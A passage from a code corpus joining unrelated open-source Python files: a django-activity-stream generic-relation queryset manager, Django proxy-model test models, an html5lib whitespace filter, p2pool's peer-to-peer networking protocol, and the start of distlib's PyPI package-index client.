options = parser.parse_args(args)
for current_line in main(options):
print current_line
| apache-2.0 |
affan2/django-activity-stream | actstream/gfk.py | 5 | 3322 | from django.conf import settings
from django.db.models import Manager
from django.db.models.query import QuerySet, EmptyQuerySet
from django.utils.encoding import smart_unicode
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.generic import GenericForeignKey
class GFKManager(Manager):
"""
A manager that returns a GFKQuerySet instead of a regular QuerySet.
"""
def get_query_set(self):
return GFKQuerySet(self.model, using=self.db)
def none(self):
return self.get_query_set().none()
class GFKQuerySet(QuerySet):
"""
A QuerySet with a fetch_generic_relations() method to bulk fetch
all generic related items. Similar to select_related(), but for
generic foreign keys.
Based on http://www.djangosnippets.org/snippets/984/
Firstly improved at http://www.djangosnippets.org/snippets/1079/
Extended in django-activity-stream to allow for multi db, text primary keys
and empty querysets.
"""
def fetch_generic_relations(self, *args):
from actstream import settings as actstream_settings
qs = self._clone()
if not actstream_settings.FETCH_RELATIONS:
return qs
gfk_fields = [g for g in self.model._meta.virtual_fields
if isinstance(g, GenericForeignKey)]
if args:
gfk_fields = filter(lambda g: g.name in args, gfk_fields)
if actstream_settings.USE_PREFETCH and hasattr(self, 'prefetch_related'):
return qs.prefetch_related(*[g.name for g in gfk_fields])
ct_map, data_map = {}, {}
for item in qs:
for gfk in gfk_fields:
if getattr(item, gfk.fk_field) is None:
continue
ct_id_field = self.model._meta.get_field(gfk.ct_field).column
if getattr(item, ct_id_field) is None:
continue
ct_map.setdefault(getattr(item, ct_id_field), {}
)[smart_unicode(getattr(item, gfk.fk_field))] = (gfk.name,
item.pk)
ctypes = ContentType.objects.using(self.db).in_bulk(ct_map.keys())
for ct_id, items_ in ct_map.items():
if ct_id:
ct = ctypes[ct_id]
model_class = ct.model_class()
objects = model_class._default_manager.select_related(
depth=actstream_settings.GFK_FETCH_DEPTH)
for o in objects.filter(pk__in=items_.keys()):
(gfk_name, item_id) = items_[smart_unicode(o.pk)]
data_map[(ct_id, smart_unicode(o.pk))] = o
for item in qs:
for gfk in gfk_fields:
if getattr(item, gfk.fk_field) != None:
ct_id_field = self.model._meta.get_field(gfk.ct_field)\
.column
setattr(item, gfk.name,
data_map[(
getattr(item, ct_id_field),
smart_unicode(getattr(item, gfk.fk_field))
)])
return qs
def none(self):
return self._clone(klass=EmptyGFKQuerySet)
class EmptyGFKQuerySet(GFKQuerySet, EmptyQuerySet):
def fetch_generic_relations(self):
return self
| bsd-3-clause |
MRigal/django | tests/proxy_models/models.py | 97 | 4411 | """
By specifying the 'proxy' Meta attribute, model subclasses can specify that
they will take data directly from the table of their base class table rather
than using a new table of their own. This allows them to act as simple proxies,
providing a modified interface to the data from the base class.
"""
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
# A couple of managers for testing managing overriding in proxy model cases.
class PersonManager(models.Manager):
def get_queryset(self):
return super(PersonManager, self).get_queryset().exclude(name="fred")
class SubManager(models.Manager):
def get_queryset(self):
return super(SubManager, self).get_queryset().exclude(name="wilma")
@python_2_unicode_compatible
class Person(models.Model):
"""
A simple concrete base class.
"""
name = models.CharField(max_length=50)
objects = PersonManager()
def __str__(self):
return self.name
class Abstract(models.Model):
"""
A simple abstract base class, to be used for error checking.
"""
data = models.CharField(max_length=10)
class Meta:
abstract = True
class MyPerson(Person):
"""
A proxy subclass, this should not get a new table. Overrides the default
manager.
"""
class Meta:
proxy = True
ordering = ["name"]
permissions = (
("display_users", "May display users information"),
)
objects = SubManager()
other = PersonManager()
def has_special_name(self):
return self.name.lower() == "special"
class ManagerMixin(models.Model):
excluder = SubManager()
class Meta:
abstract = True
class OtherPerson(Person, ManagerMixin):
"""
A class with the default manager from Person, plus an secondary manager.
"""
class Meta:
proxy = True
ordering = ["name"]
class StatusPerson(MyPerson):
"""
A non-proxy subclass of a proxy, it should get a new table.
"""
status = models.CharField(max_length=80)
# We can even have proxies of proxies (and subclass of those).
class MyPersonProxy(MyPerson):
class Meta:
proxy = True
class LowerStatusPerson(MyPersonProxy):
status = models.CharField(max_length=80)
@python_2_unicode_compatible
class User(models.Model):
name = models.CharField(max_length=100)
def __str__(self):
return self.name
class UserProxy(User):
class Meta:
proxy = True
class UserProxyProxy(UserProxy):
class Meta:
proxy = True
# We can still use `select_related()` to include related models in our querysets.
class Country(models.Model):
name = models.CharField(max_length=50)
@python_2_unicode_compatible
class State(models.Model):
name = models.CharField(max_length=50)
country = models.ForeignKey(Country)
def __str__(self):
return self.name
class StateProxy(State):
class Meta:
proxy = True
# Proxy models still works with filters (on related fields)
# and select_related, even when mixed with model inheritance
@python_2_unicode_compatible
class BaseUser(models.Model):
name = models.CharField(max_length=255)
def __str__(self):
return ':'.join((self.__class__.__name__, self.name,))
class TrackerUser(BaseUser):
status = models.CharField(max_length=50)
class ProxyTrackerUser(TrackerUser):
class Meta:
proxy = True
@python_2_unicode_compatible
class Issue(models.Model):
summary = models.CharField(max_length=255)
assignee = models.ForeignKey(ProxyTrackerUser)
def __str__(self):
return ':'.join((self.__class__.__name__, self.summary,))
class Bug(Issue):
version = models.CharField(max_length=50)
reporter = models.ForeignKey(BaseUser)
class ProxyBug(Bug):
"""
Proxy of an inherited class
"""
class Meta:
proxy = True
class ProxyProxyBug(ProxyBug):
"""
A proxy of proxy model with related field
"""
class Meta:
proxy = True
class Improvement(Issue):
"""
A model that has relation to a proxy model
or to a proxy of proxy model
"""
version = models.CharField(max_length=50)
reporter = models.ForeignKey(ProxyTrackerUser)
associated_bug = models.ForeignKey(ProxyProxyBug)
class ProxyImprovement(Improvement):
class Meta:
proxy = True
| bsd-3-clause |
bgris/ODL_bgris | lib/python3.5/site-packages/pip/_vendor/html5lib/filters/whitespace.py | 353 | 1139 | from __future__ import absolute_import, division, unicode_literals
import re
from . import base
from ..constants import rcdataElements, spaceCharacters
spaceCharacters = "".join(spaceCharacters)
SPACES_REGEX = re.compile("[%s]+" % spaceCharacters)
class Filter(base.Filter):
spacePreserveElements = frozenset(["pre", "textarea"] + list(rcdataElements))
def __iter__(self):
preserve = 0
for token in base.Filter.__iter__(self):
type = token["type"]
if type == "StartTag" \
and (preserve or token["name"] in self.spacePreserveElements):
preserve += 1
elif type == "EndTag" and preserve:
preserve -= 1
elif not preserve and type == "SpaceCharacters" and token["data"]:
# Test on token["data"] above to not introduce spaces where there were not
token["data"] = " "
elif not preserve and type == "Characters":
token["data"] = collapse_spaces(token["data"])
yield token
def collapse_spaces(text):
return SPACES_REGEX.sub(' ', text)
| gpl-3.0 |
zcoder/p2pool | p2pool/p2p.py | 39 | 28021 | from __future__ import division
import math
import random
import sys
import time
from twisted.internet import defer, protocol, reactor
from twisted.python import failure, log
import p2pool
from p2pool import data as p2pool_data
from p2pool.bitcoin import data as bitcoin_data
from p2pool.util import deferral, p2protocol, pack, variable
class PeerMisbehavingError(Exception):
pass
def fragment(f, **kwargs):
try:
f(**kwargs)
except p2protocol.TooLong:
fragment(f, **dict((k, v[:len(v)//2]) for k, v in kwargs.iteritems()))
fragment(f, **dict((k, v[len(v)//2:]) for k, v in kwargs.iteritems()))
class Protocol(p2protocol.Protocol):
VERSION = 1300
max_remembered_txs_size = 2500000
def __init__(self, node, incoming):
p2protocol.Protocol.__init__(self, node.net.PREFIX, 1000000, node.traffic_happened)
self.node = node
self.incoming = incoming
self.other_version = None
self.connected2 = False
def connectionMade(self):
self.factory.proto_made_connection(self)
self.connection_lost_event = variable.Event()
self.addr = self.transport.getPeer().host, self.transport.getPeer().port
self.send_version(
version=self.VERSION,
services=0,
addr_to=dict(
services=0,
address=self.transport.getPeer().host,
port=self.transport.getPeer().port,
),
addr_from=dict(
services=0,
address=self.transport.getHost().host,
port=self.transport.getHost().port,
),
nonce=self.node.nonce,
sub_version=p2pool.__version__,
mode=1,
best_share_hash=self.node.best_share_hash_func(),
)
self.timeout_delayed = reactor.callLater(10, self._connect_timeout)
self.get_shares = deferral.GenericDeferrer(
max_id=2**256,
func=lambda id, hashes, parents, stops: self.send_sharereq(id=id, hashes=hashes, parents=parents, stops=stops),
timeout=15,
on_timeout=self.disconnect,
)
self.remote_tx_hashes = set() # view of peer's known_txs # not actually initially empty, but sending txs instead of tx hashes won't hurt
self.remote_remembered_txs_size = 0
self.remembered_txs = {} # view of peer's mining_txs
self.remembered_txs_size = 0
self.known_txs_cache = {}
def _connect_timeout(self):
self.timeout_delayed = None
print 'Handshake timed out, disconnecting from %s:%i' % self.addr
self.disconnect()
def packetReceived(self, command, payload2):
try:
if command != 'version' and not self.connected2:
raise PeerMisbehavingError('first message was not version message')
p2protocol.Protocol.packetReceived(self, command, payload2)
except PeerMisbehavingError, e:
print 'Peer %s:%i misbehaving, will drop and ban. Reason:' % self.addr, e.message
self.badPeerHappened()
def badPeerHappened(self):
if p2pool.DEBUG:
print "Bad peer banned:", self.addr
self.disconnect()
if self.transport.getPeer().host != '127.0.0.1': # never ban localhost
self.node.bans[self.transport.getPeer().host] = time.time() + 60*60
def _timeout(self):
self.timeout_delayed = None
print 'Connection timed out, disconnecting from %s:%i' % self.addr
self.disconnect()
message_version = pack.ComposedType([
('version', pack.IntType(32)),
('services', pack.IntType(64)),
('addr_to', bitcoin_data.address_type),
('addr_from', bitcoin_data.address_type),
('nonce', pack.IntType(64)),
('sub_version', pack.VarStrType()),
('mode', pack.IntType(32)), # always 1 for legacy compatibility
('best_share_hash', pack.PossiblyNoneType(0, pack.IntType(256))),
])
def handle_version(self, version, services, addr_to, addr_from, nonce, sub_version, mode, best_share_hash):
if self.other_version is not None:
raise PeerMisbehavingError('more than one version message')
if version < 1300:
raise PeerMisbehavingError('peer too old')
self.other_version = version
self.other_sub_version = sub_version[:512]
self.other_services = services
if nonce == self.node.nonce:
raise PeerMisbehavingError('was connected to self')
if nonce in self.node.peers:
if p2pool.DEBUG:
print 'Detected duplicate connection, disconnecting from %s:%i' % self.addr
self.disconnect()
return
self.nonce = nonce
self.connected2 = True
self.timeout_delayed.cancel()
self.timeout_delayed = reactor.callLater(100, self._timeout)
old_dataReceived = self.dataReceived
def new_dataReceived(data):
if self.timeout_delayed is not None:
self.timeout_delayed.reset(100)
old_dataReceived(data)
self.dataReceived = new_dataReceived
self.factory.proto_connected(self)
self._stop_thread = deferral.run_repeatedly(lambda: [
self.send_ping(),
random.expovariate(1/100)][-1])
if self.node.advertise_ip:
self._stop_thread2 = deferral.run_repeatedly(lambda: [
self.send_addrme(port=self.node.serverfactory.listen_port.getHost().port) if self.node.serverfactory.listen_port is not None else None,
random.expovariate(1/(100*len(self.node.peers) + 1))][-1])
if best_share_hash is not None:
self.node.handle_share_hashes([best_share_hash], self)
def update_remote_view_of_my_known_txs(before, after):
added = set(after) - set(before)
removed = set(before) - set(after)
if added:
self.send_have_tx(tx_hashes=list(added))
if removed:
self.send_losing_tx(tx_hashes=list(removed))
# cache forgotten txs here for a little while so latency of "losing_tx" packets doesn't cause problems
key = max(self.known_txs_cache) + 1 if self.known_txs_cache else 0
self.known_txs_cache[key] = dict((h, before[h]) for h in removed)
reactor.callLater(20, self.known_txs_cache.pop, key)
watch_id = self.node.known_txs_var.transitioned.watch(update_remote_view_of_my_known_txs)
self.connection_lost_event.watch(lambda: self.node.known_txs_var.transitioned.unwatch(watch_id))
self.send_have_tx(tx_hashes=self.node.known_txs_var.value.keys())
def update_remote_view_of_my_mining_txs(before, after):
added = set(after) - set(before)
removed = set(before) - set(after)
if added:
self.remote_remembered_txs_size += sum(100 + bitcoin_data.tx_type.packed_size(after[x]) for x in added)
assert self.remote_remembered_txs_size <= self.max_remembered_txs_size
fragment(self.send_remember_tx, tx_hashes=[x for x in added if x in self.remote_tx_hashes], txs=[after[x] for x in added if x not in self.remote_tx_hashes])
if removed:
self.send_forget_tx(tx_hashes=list(removed))
self.remote_remembered_txs_size -= sum(100 + bitcoin_data.tx_type.packed_size(before[x]) for x in removed)
watch_id2 = self.node.mining_txs_var.transitioned.watch(update_remote_view_of_my_mining_txs)
self.connection_lost_event.watch(lambda: self.node.mining_txs_var.transitioned.unwatch(watch_id2))
self.remote_remembered_txs_size += sum(100 + bitcoin_data.tx_type.packed_size(x) for x in self.node.mining_txs_var.value.values())
assert self.remote_remembered_txs_size <= self.max_remembered_txs_size
fragment(self.send_remember_tx, tx_hashes=[], txs=self.node.mining_txs_var.value.values())
message_ping = pack.ComposedType([])
def handle_ping(self):
pass
message_addrme = pack.ComposedType([
('port', pack.IntType(16)),
])
def handle_addrme(self, port):
host = self.transport.getPeer().host
#print 'addrme from', host, port
if host == '127.0.0.1':
if random.random() < .8 and self.node.peers:
random.choice(self.node.peers.values()).send_addrme(port=port) # services...
else:
self.node.got_addr((self.transport.getPeer().host, port), self.other_services, int(time.time()))
if random.random() < .8 and self.node.peers:
random.choice(self.node.peers.values()).send_addrs(addrs=[
dict(
address=dict(
services=self.other_services,
address=host,
port=port,
),
timestamp=int(time.time()),
),
])
message_addrs = pack.ComposedType([
('addrs', pack.ListType(pack.ComposedType([
('timestamp', pack.IntType(64)),
('address', bitcoin_data.address_type),
]))),
])
def handle_addrs(self, addrs):
for addr_record in addrs:
self.node.got_addr((addr_record['address']['address'], addr_record['address']['port']), addr_record['address']['services'], min(int(time.time()), addr_record['timestamp']))
if random.random() < .8 and self.node.peers:
random.choice(self.node.peers.values()).send_addrs(addrs=[addr_record])
message_getaddrs = pack.ComposedType([
('count', pack.IntType(32)),
])
def handle_getaddrs(self, count):
if count > 100:
count = 100
self.send_addrs(addrs=[
dict(
timestamp=int(self.node.addr_store[host, port][2]),
address=dict(
services=self.node.addr_store[host, port][0],
address=host,
port=port,
),
) for host, port in
self.node.get_good_peers(count)
])
message_shares = pack.ComposedType([
('shares', pack.ListType(p2pool_data.share_type)),
])
def handle_shares(self, shares):
result = []
for wrappedshare in shares:
if wrappedshare['type'] < p2pool_data.Share.VERSION: continue
share = p2pool_data.load_share(wrappedshare, self.node.net, self.addr)
if wrappedshare['type'] >= 13:
txs = []
for tx_hash in share.share_info['new_transaction_hashes']:
if tx_hash in self.node.known_txs_var.value:
tx = self.node.known_txs_var.value[tx_hash]
else:
for cache in self.known_txs_cache.itervalues():
if tx_hash in cache:
tx = cache[tx_hash]
print 'Transaction %064x rescued from peer latency cache!' % (tx_hash,)
break
else:
print >>sys.stderr, 'Peer referenced unknown transaction %064x, disconnecting' % (tx_hash,)
self.disconnect()
return
txs.append(tx)
else:
txs = None
result.append((share, txs))
self.node.handle_shares(result, self)
def sendShares(self, shares, tracker, known_txs, include_txs_with=[]):
tx_hashes = set()
for share in shares:
if share.VERSION >= 13:
# send full transaction for every new_transaction_hash that peer does not know
for tx_hash in share.share_info['new_transaction_hashes']:
assert tx_hash in known_txs, 'tried to broadcast share without knowing all its new transactions'
if tx_hash not in self.remote_tx_hashes:
tx_hashes.add(tx_hash)
continue
if share.hash in include_txs_with:
x = share.get_other_tx_hashes(tracker)
if x is not None:
tx_hashes.update(x)
hashes_to_send = [x for x in tx_hashes if x not in self.node.mining_txs_var.value and x in known_txs]
new_remote_remembered_txs_size = self.remote_remembered_txs_size + sum(100 + bitcoin_data.tx_type.packed_size(known_txs[x]) for x in hashes_to_send)
if new_remote_remembered_txs_size > self.max_remembered_txs_size:
raise ValueError('shares have too many txs')
self.remote_remembered_txs_size = new_remote_remembered_txs_size
fragment(self.send_remember_tx, tx_hashes=[x for x in hashes_to_send if x in self.remote_tx_hashes], txs=[known_txs[x] for x in hashes_to_send if x not in self.remote_tx_hashes])
fragment(self.send_shares, shares=[share.as_share() for share in shares])
self.send_forget_tx(tx_hashes=hashes_to_send)
self.remote_remembered_txs_size -= sum(100 + bitcoin_data.tx_type.packed_size(known_txs[x]) for x in hashes_to_send)
message_sharereq = pack.ComposedType([
('id', pack.IntType(256)),
('hashes', pack.ListType(pack.IntType(256))),
('parents', pack.VarIntType()),
('stops', pack.ListType(pack.IntType(256))),
])
def handle_sharereq(self, id, hashes, parents, stops):
shares = self.node.handle_get_shares(hashes, parents, stops, self)
try:
self.send_sharereply(id=id, result='good', shares=[share.as_share() for share in shares])
except p2protocol.TooLong:
self.send_sharereply(id=id, result='too long', shares=[])
message_sharereply = pack.ComposedType([
('id', pack.IntType(256)),
('result', pack.EnumType(pack.VarIntType(), {0: 'good', 1: 'too long', 2: 'unk2', 3: 'unk3', 4: 'unk4', 5: 'unk5', 6: 'unk6'})),
('shares', pack.ListType(p2pool_data.share_type)),
])
class ShareReplyError(Exception): pass
def handle_sharereply(self, id, result, shares):
if result == 'good':
res = [p2pool_data.load_share(share, self.node.net, self.addr) for share in shares if share['type'] >= p2pool_data.Share.VERSION]
else:
res = failure.Failure(self.ShareReplyError(result))
self.get_shares.got_response(id, res)
message_bestblock = pack.ComposedType([
('header', bitcoin_data.block_header_type),
])
def handle_bestblock(self, header):
self.node.handle_bestblock(header, self)
message_have_tx = pack.ComposedType([
('tx_hashes', pack.ListType(pack.IntType(256))),
])
def handle_have_tx(self, tx_hashes):
#assert self.remote_tx_hashes.isdisjoint(tx_hashes)
self.remote_tx_hashes.update(tx_hashes)
while len(self.remote_tx_hashes) > 10000:
self.remote_tx_hashes.pop()
message_losing_tx = pack.ComposedType([
('tx_hashes', pack.ListType(pack.IntType(256))),
])
def handle_losing_tx(self, tx_hashes):
#assert self.remote_tx_hashes.issuperset(tx_hashes)
self.remote_tx_hashes.difference_update(tx_hashes)
message_remember_tx = pack.ComposedType([
('tx_hashes', pack.ListType(pack.IntType(256))),
('txs', pack.ListType(bitcoin_data.tx_type)),
])
def handle_remember_tx(self, tx_hashes, txs):
for tx_hash in tx_hashes:
if tx_hash in self.remembered_txs:
print >>sys.stderr, 'Peer referenced transaction twice, disconnecting'
self.disconnect()
return
if tx_hash in self.node.known_txs_var.value:
tx = self.node.known_txs_var.value[tx_hash]
else:
for cache in self.known_txs_cache.itervalues():
if tx_hash in cache:
tx = cache[tx_hash]
print 'Transaction %064x rescued from peer latency cache!' % (tx_hash,)
break
else:
print >>sys.stderr, 'Peer referenced unknown transaction %064x, disconnecting' % (tx_hash,)
self.disconnect()
return
self.remembered_txs[tx_hash] = tx
self.remembered_txs_size += 100 + bitcoin_data.tx_type.packed_size(tx)
new_known_txs = dict(self.node.known_txs_var.value)
warned = False
for tx in txs:
tx_hash = bitcoin_data.hash256(bitcoin_data.tx_type.pack(tx))
if tx_hash in self.remembered_txs:
print >>sys.stderr, 'Peer referenced transaction twice, disconnecting'
self.disconnect()
return
if tx_hash in self.node.known_txs_var.value and not warned:
print 'Peer sent entire transaction %064x that was already received' % (tx_hash,)
warned = True
self.remembered_txs[tx_hash] = tx
self.remembered_txs_size += 100 + bitcoin_data.tx_type.packed_size(tx)
new_known_txs[tx_hash] = tx
self.node.known_txs_var.set(new_known_txs)
if self.remembered_txs_size >= self.max_remembered_txs_size:
raise PeerMisbehavingError('too much transaction data stored')
message_forget_tx = pack.ComposedType([
('tx_hashes', pack.ListType(pack.IntType(256))),
])
def handle_forget_tx(self, tx_hashes):
for tx_hash in tx_hashes:
self.remembered_txs_size -= 100 + bitcoin_data.tx_type.packed_size(self.remembered_txs[tx_hash])
assert self.remembered_txs_size >= 0
del self.remembered_txs[tx_hash]
def connectionLost(self, reason):
self.connection_lost_event.happened()
if self.timeout_delayed is not None:
self.timeout_delayed.cancel()
if self.connected2:
self.factory.proto_disconnected(self, reason)
self._stop_thread()
if self.node.advertise_ip:
self._stop_thread2()
self.connected2 = False
self.factory.proto_lost_connection(self, reason)
if p2pool.DEBUG:
print "Peer connection lost:", self.addr, reason
self.get_shares.respond_all(reason)
@defer.inlineCallbacks
def do_ping(self):
start = reactor.seconds()
yield self.get_shares(hashes=[0], parents=0, stops=[])
end = reactor.seconds()
defer.returnValue(end - start)
class ServerFactory(protocol.ServerFactory):
def __init__(self, node, max_conns):
self.node = node
self.max_conns = max_conns
self.conns = {}
self.running = False
self.listen_port = None
def buildProtocol(self, addr):
if sum(self.conns.itervalues()) >= self.max_conns or self.conns.get(self._host_to_ident(addr.host), 0) >= 3:
return None
if addr.host in self.node.bans and self.node.bans[addr.host] > time.time():
return None
p = Protocol(self.node, True)
p.factory = self
if p2pool.DEBUG:
print "Got peer connection from:", addr
return p
def _host_to_ident(self, host):
a, b, c, d = host.split('.')
return a, b
def proto_made_connection(self, proto):
ident = self._host_to_ident(proto.transport.getPeer().host)
self.conns[ident] = self.conns.get(ident, 0) + 1
def proto_lost_connection(self, proto, reason):
ident = self._host_to_ident(proto.transport.getPeer().host)
self.conns[ident] -= 1
if not self.conns[ident]:
del self.conns[ident]
def proto_connected(self, proto):
self.node.got_conn(proto)
def proto_disconnected(self, proto, reason):
self.node.lost_conn(proto, reason)
def start(self):
assert not self.running
self.running = True
def attempt_listen():
if self.running:
self.listen_port = reactor.listenTCP(self.node.port, self)
deferral.retry('Error binding to P2P port:', traceback=False)(attempt_listen)()
def stop(self):
assert self.running
self.running = False
return self.listen_port.stopListening()
class ClientFactory(protocol.ClientFactory):
def __init__(self, node, desired_conns, max_attempts):
self.node = node
self.desired_conns = desired_conns
self.max_attempts = max_attempts
self.attempts = set()
self.conns = set()
self.running = False
def _host_to_ident(self, host):
a, b, c, d = host.split('.')
return a, b
def buildProtocol(self, addr):
p = Protocol(self.node, False)
p.factory = self
return p
def startedConnecting(self, connector):
ident = self._host_to_ident(connector.getDestination().host)
if ident in self.attempts:
raise AssertionError('already have attempt')
self.attempts.add(ident)
def clientConnectionFailed(self, connector, reason):
self.attempts.remove(self._host_to_ident(connector.getDestination().host))
def clientConnectionLost(self, connector, reason):
self.attempts.remove(self._host_to_ident(connector.getDestination().host))
def proto_made_connection(self, proto):
pass
def proto_lost_connection(self, proto, reason):
pass
def proto_connected(self, proto):
self.conns.add(proto)
self.node.got_conn(proto)
def proto_disconnected(self, proto, reason):
self.conns.remove(proto)
self.node.lost_conn(proto, reason)
def start(self):
assert not self.running
self.running = True
self._stop_thinking = deferral.run_repeatedly(self._think)
def stop(self):
assert self.running
self.running = False
self._stop_thinking()
def _think(self):
try:
if len(self.conns) < self.desired_conns and len(self.attempts) < self.max_attempts and self.node.addr_store:
(host, port), = self.node.get_good_peers(1)
if self._host_to_ident(host) in self.attempts:
pass
elif host in self.node.bans and self.node.bans[host] > time.time():
pass
else:
#print 'Trying to connect to', host, port
reactor.connectTCP(host, port, self, timeout=5)
except:
log.err()
return random.expovariate(1/1)
class SingleClientFactory(protocol.ReconnectingClientFactory):
def __init__(self, node):
self.node = node
def buildProtocol(self, addr):
p = Protocol(self.node, incoming=False)
p.factory = self
return p
def proto_made_connection(self, proto):
pass
def proto_lost_connection(self, proto, reason):
pass
def proto_connected(self, proto):
self.resetDelay()
self.node.got_conn(proto)
def proto_disconnected(self, proto, reason):
self.node.lost_conn(proto, reason)
class Node(object):
def __init__(self, best_share_hash_func, port, net, addr_store={}, connect_addrs=set(), desired_outgoing_conns=10, max_outgoing_attempts=30, max_incoming_conns=50, preferred_storage=1000, known_txs_var=variable.Variable({}), mining_txs_var=variable.Variable({}), advertise_ip=True):
self.best_share_hash_func = best_share_hash_func
self.port = port
self.net = net
self.addr_store = dict(addr_store)
self.connect_addrs = connect_addrs
self.preferred_storage = preferred_storage
self.known_txs_var = known_txs_var
self.mining_txs_var = mining_txs_var
self.advertise_ip = advertise_ip
self.traffic_happened = variable.Event()
self.nonce = random.randrange(2**64)
self.peers = {}
self.bans = {} # address -> end_time
self.clientfactory = ClientFactory(self, desired_outgoing_conns, max_outgoing_attempts)
self.serverfactory = ServerFactory(self, max_incoming_conns)
self.running = False
def start(self):
if self.running:
raise ValueError('already running')
self.clientfactory.start()
self.serverfactory.start()
self.singleclientconnectors = [reactor.connectTCP(addr, port, SingleClientFactory(self)) for addr, port in self.connect_addrs]
self.running = True
self._stop_thinking = deferral.run_repeatedly(self._think)
def _think(self):
try:
if len(self.addr_store) < self.preferred_storage and self.peers:
random.choice(self.peers.values()).send_getaddrs(count=8)
except:
log.err()
return random.expovariate(1/20)
@defer.inlineCallbacks
def stop(self):
if not self.running:
raise ValueError('already stopped')
self.running = False
self._stop_thinking()
yield self.clientfactory.stop()
yield self.serverfactory.stop()
for singleclientconnector in self.singleclientconnectors:
yield singleclientconnector.factory.stopTrying()
yield singleclientconnector.disconnect()
del self.singleclientconnectors
def got_conn(self, conn):
if conn.nonce in self.peers:
raise ValueError('already have peer')
self.peers[conn.nonce] = conn
print '%s connection to peer %s:%i established. p2pool version: %i %r' % ('Incoming' if conn.incoming else 'Outgoing', conn.addr[0], conn.addr[1], conn.other_version, conn.other_sub_version)
def lost_conn(self, conn, reason):
if conn.nonce not in self.peers:
raise ValueError('''don't have peer''')
if conn is not self.peers[conn.nonce]:
raise ValueError('wrong conn')
del self.peers[conn.nonce]
print 'Lost peer %s:%i - %s' % (conn.addr[0], conn.addr[1], reason.getErrorMessage())
def got_addr(self, (host, port), services, timestamp):
if (host, port) in self.addr_store:
old_services, old_first_seen, old_last_seen = self.addr_store[host, port]
self.addr_store[host, port] = services, old_first_seen, max(old_last_seen, timestamp)
else:
if len(self.addr_store) < 10000:
self.addr_store[host, port] = services, timestamp, timestamp
def handle_shares(self, shares, peer):
print 'handle_shares', (shares, peer)
def handle_share_hashes(self, hashes, peer):
print 'handle_share_hashes', (hashes, peer)
def handle_get_shares(self, hashes, parents, stops, peer):
print 'handle_get_shares', (hashes, parents, stops, peer)
def handle_bestblock(self, header, peer):
print 'handle_bestblock', header
def get_good_peers(self, max_count):
t = time.time()
return [x[0] for x in sorted(self.addr_store.iteritems(), key=lambda (k, (services, first_seen, last_seen)):
-math.log(max(3600, last_seen - first_seen))/math.log(max(3600, t - last_seen))*random.expovariate(1)
)][:max_count]
| gpl-3.0 |
James-Firth/pip | pip/_vendor/distlib/index.py | 571 | 20976 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,
urlparse, build_opener, string_types)
from .util import cached_property, zip_dir, ServerProxy
logger = logging.getLogger(__name__)
DEFAULT_INDEX = 'https://pypi.python.org/pypi'
DEFAULT_REALM = 'pypi'
class PackageIndex(object):
"""
This class represents a package index compatible with PyPI, the Python
Package Index.
"""
boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'
def __init__(self, url=None):
"""
Initialise an instance.
:param url: The URL of the index. If not specified, the URL for PyPI is
used.
"""
self.url = url or DEFAULT_INDEX
self.read_configuration()
scheme, netloc, path, params, query, frag = urlparse(self.url)
if params or query or frag or scheme not in ('http', 'https'):
raise DistlibException('invalid repository: %s' % self.url)
self.password_handler = None
self.ssl_verifier = None
self.gpg = None
self.gpg_home = None
self.rpc_proxy = None
with open(os.devnull, 'w') as sink:
for s in ('gpg2', 'gpg'):
try:
rc = subprocess.check_call([s, '--version'], stdout=sink,
stderr=sink)
if rc == 0:
self.gpg = s
break
except OSError:
pass
def _get_pypirc_command(self):
"""
Get the distutils command for interacting with PyPI configurations.
:return: the command.
"""
from distutils.core import Distribution
from distutils.config import PyPIRCCommand
d = Distribution()
return PyPIRCCommand(d)
def read_configuration(self):
"""
Read the PyPI access configuration as supported by distutils, getting
PyPI to do the acutal work. This populates ``username``, ``password``,
``realm`` and ``url`` attributes from the configuration.
"""
# get distutils to do the work
c = self._get_pypirc_command()
c.repository = self.url
cfg = c._read_pypirc()
self.username = cfg.get('username')
self.password = cfg.get('password')
self.realm = cfg.get('realm', 'pypi')
self.url = cfg.get('repository', self.url)
def save_configuration(self):
"""
Save the PyPI access configuration. You must have set ``username`` and
``password`` attributes before calling this method.
Again, distutils is used to do the actual work.
"""
self.check_credentials()
# get distutils to do the work
c = self._get_pypirc_command()
c._store_pypirc(self.username, self.password)
def check_credentials(self):
"""
Check that ``username`` and ``password`` have been set, and raise an
exception if not.
"""
if self.username is None or self.password is None:
raise DistlibException('username and password must be set')
pm = HTTPPasswordMgr()
_, netloc, _, _, _, _ = urlparse(self.url)
pm.add_password(self.realm, netloc, self.username, self.password)
self.password_handler = HTTPBasicAuthHandler(pm)
def register(self, metadata):
"""
Register a distribution on PyPI, using the provided metadata.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the distribution to be
registered.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
metadata.validate()
d = metadata.todict()
d[':action'] = 'verify'
request = self.encode_request(d.items(), [])
response = self.send_request(request)
d[':action'] = 'submit'
request = self.encode_request(d.items(), [])
return self.send_request(request)
def _reader(self, name, stream, outbuf):
"""
Thread runner for reading lines of from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
:param stream: The stream to read from. This will typically a pipe
connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode('utf-8').rstrip()
outbuf.append(s)
logger.debug('%s: %s' % (name, s))
stream.close()
def get_sign_command(self, filename, signer, sign_password,
keystore=None):
"""
Return a suitable command for signing a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The signing command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
if sign_password is not None:
cmd.extend(['--batch', '--passphrase-fd', '0'])
td = tempfile.mkdtemp()
sf = os.path.join(td, os.path.basename(filename) + '.asc')
